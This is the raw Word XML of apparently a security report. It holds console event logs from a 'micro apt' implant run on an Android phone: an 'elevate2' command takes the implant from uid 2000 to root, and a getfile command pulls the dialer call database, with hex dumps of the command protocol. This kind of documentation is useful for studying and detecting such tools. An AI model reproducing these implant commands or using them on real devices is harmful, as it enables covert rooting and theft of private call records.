    <w:p w14:paraId="368669B4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000060: 20 53 4D 50 20 50 52 45 45 4D 50 54 20 54 68 75   SMP PREEMPT Thu                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D92008C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000070: 20 41 70 72 20 34 20 31 37 3A 34 30 3A 32 34 20   Apr 4 17:40:24                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452BD2C0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000080: 45 44 54 20 32 30 31 39 20 61 61 72 63 68 36 34  EDT 2019 aarch64                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D40EC10" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000090: 0A 00                                            ..                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EACF342" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>'\x92\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00z\x00\x00\x00z\x00\x00\x00\x00\x00\x00\x00os:\n===\n-android-arm64\nuname:\n======\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFD15D3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux localhost 4.4.88-gb4310317 #1 SMP PREEMPT Thu Apr 4 17:40:24 EDT 2019 aarch64\n\x00'                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B1A64" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">os:                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417046E5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">===                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5C8D7F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-android-arm64                                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ACED7E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">uname:                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1FE8FF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">======                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3A399A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux localhost 4.4.88-gb4310317 #1 SMP PREEMPT Thu Apr 4 17:40:24 EDT 2019 aarch64        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C0C747" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA9ABDC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;whoami                                                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E32F22F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x16\x00\x00\x00' (8 bytes)                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6381D80D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 16 00 00 00                          ........                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074A68E8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA73B43" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 25 00 00 00 17 00 00 00 00 00 00 00 0D 00 00 00  %...............                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46994EE8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 0D 00 00 00 00 00 00 00 75 69 64 3A 30 20 65 75  ........uid:0 eu                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027504C2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 69 64 3A 30 00                                   id:0.                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E443E39" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: uid:0 euid:0   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B13EFF1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E8DC39" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E55514B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;quit                                                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1C9B3D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x004\x00\x00\x00' (8 bytes)                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C49B5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 34 00 00 00                          ....4...                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3924505D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">breaking out of msg input loop                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412BCEAF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">finally                                                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A4F3AE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">waiting for micro apt (ctrl+c to break from loop)    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B252775" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="271" w:name="_d4via0yy057c" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="272" w:name="_Toc12600154"/>
      <w:bookmarkEnd w:id="271"/>
      <w:r>
        <w:t>Event Log 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="272"/>
    </w:p>
    <w:p w14:paraId="5B67BE1F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F5869A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27398588" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/data/local/tmp # su shell                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C48619" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">walleye:/data/local/tmp $ ./tester                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62596929" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B24424F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux localhost 4.4.88-gb4310317 #1 SMP PREEMPT Thu Apr 4 17:40:24 EDT 2019 aarch64\n\x00'                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59108034" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">os:                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69132ADF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">===                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F60A101" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-android-arm64                                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D5DBB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">uname:                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D1BBE0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">======                                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392184A0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux localhost 4.4.88-gb4310317 #1 SMP PREEMPT Thu Apr 4 17:40:24 EDT 2019 aarch64                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E9B887" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0258FB0C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;whoami                                                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA3B355" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x16\x00\x00\x00' (8 bytes)                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652391A8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 16 00 00 00                          ........                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2097B958" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AE1A3D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 2B 00 00 00 17 00 00 00 00 00 00 00 13 00 00 00  +...............                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D319BFB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 13 00 00 00 00 00 00 00 75 69 64 3A 32 30 30 30  ........uid:2000                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2339D5E9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 20 65 75 69 64 3A 32 30 30 30 00                  euid:2000.                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD00A82" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: uid:2000 euid:2000                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54300646" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;ELEVATE2                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516D9EBE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">unknown command, or bad syntax                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756FCDC4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;elevate2                                                                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D35C3E0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x002\x00\x00\x00' (8 bytes)                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A842F6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 32 00 00 00                          ....2...                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1DC85C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C47F6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 33 00 00 00 00 00 00 00 04 00 00 00  ....3...........                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F81A0B4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 00 00 00 00              ............                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFEE84A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 0                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602242FC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;whoami                                                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D70B12A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x16\x00\x00\x00' (8 bytes)                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07495627" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 16 00 00 00                          ........                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237ACAFF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CA4E49" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 25 00 00 00 17 00 00 00 00 00 00 00 0D 00 00 00  %...............                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A2275" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 0D 00 00 00 00 00 00 00 75 69 64 3A 30 20 65 75  ........uid:0 eu                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F78B77A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 69 64 3A 30 00                                   id:0.                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7523760B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: uid:0 euid:0                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C748312" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD54C23" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD6CBA2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;getfile /data/data/com.android.dialer/databases/dialer.db dialer.db                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244ED56D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: 'J\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x002\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00/data/data/com.android.dialer/databa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E8CB0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ses/dialer.db\x00' (74 bytes)                                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694830D3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 4A 00 00 00 04 00 00 00 00 00 00 00 32 00 00 00  J...........2...                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1185F648" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 32 00 00 00 00 00 00 00 2F 64 61 74 61 2F 64 61  2......./data/da                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B45E3A6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 74 61 2F 63 6F 6D 2E 61 6E 64 72 6F 69 64 2E 64  ta/com.android.d                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233B39B0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000030: 69 61 6C 65 72 2F 64 61 74 61 62 61 73 65 73 2F  ialer/databases/                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3220DB5F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000040: 64 69 61 6C 65 72 2E 64 62 00                    dialer.db.                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318C9B76" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received: '\x18\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00SQLite format 3\x00\x10\x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A34D06F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0\x01\x01\x00@  \x00\x00\x00\t\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x04\x00\x00\x00\x00\x00\x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572D38F8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0\x00\x10\x00\x00\x00\x01\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEF6BAA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00\x00\x00\x00\x00\x00\x00\x00\t\x00.\x10\xfc\r\r\n\x00'...'\x00\x00\x00\x00' (65560 bytes)                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08025657" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
